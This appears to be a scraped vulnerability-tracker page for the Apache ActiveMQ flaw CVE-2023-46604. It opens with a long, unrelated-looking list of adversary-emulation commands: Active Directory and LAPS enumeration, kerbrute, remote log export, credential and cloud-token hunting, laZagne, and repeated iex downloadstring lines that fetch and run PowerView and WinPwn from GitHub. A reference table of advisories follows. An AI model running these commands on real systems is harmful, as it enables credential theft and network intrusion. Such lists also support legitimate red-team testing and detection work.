"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (9)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-46604 |
| activemq.apache.org |
GitHub CVE
vendor-advisory
|
https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt |
| openwall.com |
GitHub CVE
|
https://www.openwall.com/lists/oss-security/2023/10/27/5 |
| security.netapp.com |
GitHub CVE
|
https://security.netapp.com/advisory/ntap-20231110-0010/ |
| packetstormsecurity.com |
GitHub CVE
|
https://packetstormsecurity.com/files/175676/Apache-ActiveMQ-Unauthenticated-Remote-Code-Execution.html |
| lists.debian.org |
GitHub CVE
|
https://lists.debian.org/debian-lts-announce/2023/11/msg00013.html |
| seclists.org |
GitHub CVE
|
http://seclists.org/fulldisclosure/2024/Apr/18 |
| lists.debian.org |
NVD API
Mailing List
|
https://lists.debian.org/debian-lts-announce/2024/10/msg00027.html |
| cisa.gov |
NVD API
Third Party Advisory
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-46604 |